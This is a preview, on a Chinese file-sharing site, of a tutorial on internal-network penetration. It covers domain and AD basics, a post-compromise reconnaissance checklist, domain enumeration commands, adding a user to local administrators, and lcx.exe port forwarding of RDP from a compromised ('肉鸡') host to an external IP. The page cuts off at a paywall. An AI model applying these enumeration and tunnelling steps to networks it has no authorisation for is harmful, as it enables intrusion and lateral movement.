没有合适的资源?快使用搜索试试~ 我知道了~
温馨提示
内容概要:本文档详细介绍了内网渗透测试的基础概念、方法和技术手段。涵盖了内网的基本架构,如域(Domain)和工作组(workgroup),以及如何在掌握一定权限的情况下进行信息收集。文档还探讨了几种常见的内网渗透技术,如端口转发、反弹 SOCKS代理、跨边界应用和使用各类工具实现的具体攻击方法,包括密码和HASH的获取与利用。此外,也讨论了一些典型的服务攻击,像SQL Server、MySQL服务的攻破以及Web应用存在的弱点。同时强调了针对不同操作系统(Windows 和 Linux)实施的具体渗透手段,以及内网安全防护的重要性。文章不仅提供了详细的理论指导,更有实战案例的支持。
资源推荐
资源详情
资源评论
1 / 61
内网渗透
内网渗透基础
内网概述
内网也指局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成
的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共
享、工作组内的日程安排、电子邮件和传真通信服务等功能。局域网是封闭型的,可以由办
公室内的两台计算机组成,也可以由一个公司内的上千台计算机组成。
域(Domain)
域 (Domain) 是 Windows 网络中独立运行的单位,域之间相互访问则需要建立信任关
系(即 Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任
关系后,2 个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资
源,使不同的域之间实现网络资源的共享与管理。域既是 Windows 网络操作系统的逻辑组
织单元,也是 Internet 的逻辑组织单元,在 Windows 网络操作系统中,域是安全边界。域
管理员只能管理域的内部,除非其他的域显式地赋予他管理权限,他才能够访问或者管理其
他的域;每个域都有自己的安全策略,以及它与其他域的安全信任关系。
工作组(workgroup)
工作组(workgroup)是不属于域的一个独立单元。工作组中的每个计算机各自维护自己
的组帐号、用户帐号及安全帐号数据库,不与其他系统共享用户信息。一个工作组组成的网
络是一个“对等网”。
AD 和 DC
如果网络规模较大,这时我们就会考虑把网络中众多的对象(被称之为 AD 对象):计
算机、用户、用户组、打印机、共享夹……分门别类、井然有序地放在一个大仓库中,并做
好检索信息,以利于查找、管理和使用这些对象(资源)。这个有层次结构的数据库,就是
活动目录数据库 (Active Directory),简称 AD 库。
接下来,我们应该把这个数据库放在哪台计算机上呢?是这样的,我们把存放有活动目
录数据库的计算机就称之为域控制器(Domain Controller),简称 DC。
2 / 61
内网信息收集
当前机器的人物身份,当前控制的这台机器人物是一个什么样的身份,客服、销售人员
还是开发人员,还是管理员。客服会做些什么,会通过什么方式跟其它人联系; 开发人员
在开发什么,应该会跟管理员联系,也会有一定的外网管理权限和内网测试服务器,这种情
况下内网测试服务器是可以搞定的。如果是客服机器或是销售人 员机器呢,他一定有整个
公司或是网络的联系方式,自己发挥想象去。是管理员机器的话就不用说。
当前网络结构的分析,是域结构,还是划分 vlan 的结构,大多数大型网络是域结构。
一般外网的服务器都是有硬件防火墙的,并且指定内网的某些机器的 mac 才可以连接。假
设现在已经拥有一台内网[域]机器.我们先看看内网情况:
本机信息收集
[+]用户列表[Windows 用户列表/邮件用户]
-->分析 Windows 用户列表,不要忽略 administrator.
-->分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户,例如:owa
[+]进程列表
-->分析杀毒软件/安全监控工具等
-->邮件客户端
-->VPN 等
[+]服务列表
-->与安全防范工具有关服务[判断是否可以手动开关等]
-->存在问题的服务[权限/漏洞]
[+]端口列表
-->开放端口对应的常见服务/应用程序[匿名/权限/漏洞等]
-->利用端口进行信息收集,建议大家深入挖掘[NETBIOS,SMB 等]
[+]补丁列表
-->分析 Windows 补丁
3 / 61
-->第三方软件[Java/Oracle/Flash 等]漏洞
[+]本机共享[域内共享很多时候相同]
-->本机共享列表/访问权限
-->本机访问的域共享/访问权限
[+]本地用户习惯分析
-->历史记录
-->收藏夹
-->文档等
扩散信息收集
[+]利用本机获取的信息收集内网[域]其他机器的信息.
-->用户列表/共享/进程/服务等.[参考上面]
[+]收集 Active Directory 信息
-->最好是获取 AD 副本.
常见信息收集命令
net user ------> 本机用户列表
net localgroup administrators ------> 本机管理员[通常含有域用户]
net user /domain ------> 查询域用户
net group /domain ------> 查询域里面的工作组
net group "domain admins" /domain ------> 查询域管理员用户组
net localgroup administrators /domain ------> 登录本机的域管理员
net localgroup administrators workgroup\user001 /add ----->域用户添加到本机
net group "Domain controllers" -------> 查看域控制器(如果有多台)
ipconfig /all ------> 查询本机 IP 段,所在域等
4 / 61
net view ------> 查询同一域内机器列表
net view /domain ------> 查询域列表
net view /domain:domainname -----> 查看 workgroup 域中计算机列表
dsquery 命令
1、列出该域内所有机器名(dsquery computer domainroot -limit 65535 && net group "domain
computers" /domain)
2、列出该域内所有用户名(dsquery user domainroot -limit 65535 && net user /domain)
3、列出该域内网段划分 (dsquery subnet)
4、列出该域内分组 (dsquery group && net group /domain)
5、列出该域内组织单位 (dsquery ou)
6、列出该域内域控制器 (dsquery server && net time /domain)
7、列出域管理员帐号 (net group "domain admins" /domain)
第三方信息收集
NETBIOS 信息收集工具
SMB 信息收集
空会话信息收集
端口信息收集
漏洞信息收集
……
内网渗透方法
内网跨边界应用
内网跨边界概述
在理论上只要网络连接的计算机都是可以访问的,但是在实际中往往由于技术水平等原
因,很难实现它;例如局域网中的某台计算机仅仅开放了 Web 服务,该服务仅能供内网用户
使用,而外网用户根本没有办法直接访问。因此要想让外网用户能够访问局域网中的系统服
5 / 61
务,这必须进行端口转发反弹代理等操作才行。
Windows 下跨边界的应用
Lcx.exe 端口转发工具
Lcx.exe 是一个端口转发工具,相当于把肉鸡 A 上的3389端口转发到具有外网 IP 地址
的 B 机上,这样连接 B 机的3389端口就相当于链接 A 机的3389端口。Lcx 程序多用于被控
制计算机(肉鸡)处于内网的情况,被控制机可能中了木马程序,虽然能够进行控制,但还是
没有使用远程终端登陆到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计
算机上开启3389端口,然后通过 lcx 等程序进行端口转发,进而在本地连接到被控制计算机
的远程终端并进行管理和使用。
1.确定被控制计算机的 IP 地址
在被控制计算机上开启远程终端,然后执行“ipconfig /all”命令,查看其网络配置情况,如图
1所示,该计算机的 ip 地址为“192.168.0.162”
2.在被控制计算机上执行端口转发命令
在被控制计算机上执行“lcx –slave 外网 IP 51 192.168.0.162 3389”,如图2所示,执行完
毕后会给出一些提示,如果显示为“Make a Connection to 218.69.*.*:51”则表示端口转发正确。
剩余60页未读,继续阅读
资源评论
漏洞库-网络安全
- 粉丝: 286
- 资源: 9
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- 对通信原理的内容的matlab实现.zip
- 多变量数据相空间重构参数估计的MATLAB代码.zip
- 对同步采集的三个信号PPGECGBP进行特征提取的matlab程序.zip
- 多目标优化的MATLAB工具.zip
- 得一微EMMC规格书 SILICONGO SGM800C
- 多维扩散MRI的MATLAB代码.zip
- PCemV17 Win版+ROM
- 多输出高斯过程在MATLAB中包括潜在力模型.zip
- 仿真具有信道丢失指向误差的自由空间光学FSO通信系统,并与所有解析解进行比较,给出了完整的MATLAB代码.zip
- 二维和三维弹塑性有限元矩阵的MATLAB快速装配.zip
- 范德比尔特大学的Coursera课程《MATLAB编程入门》.zip
- 符号电路的MATLAB分析.zip
- 非刚性迭代最近点nricp.zip
- 该MATLAB包实现了Christopher Diehl和Gert Cauwenberghs在SVM增量学习自适应与优.zip
- 该存储库包含FPGAHDL演示若干波束形成和雷达设计,提供了Simulink模型和MATLAB参考代码来展示各种雷达和.zip
- 该工具箱包括MATLAB脚本,用于执行皮层表面图之间解剖对应关系的旋转测试,如关于人脑结构和功能图之间空间对应关系的测.zip
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功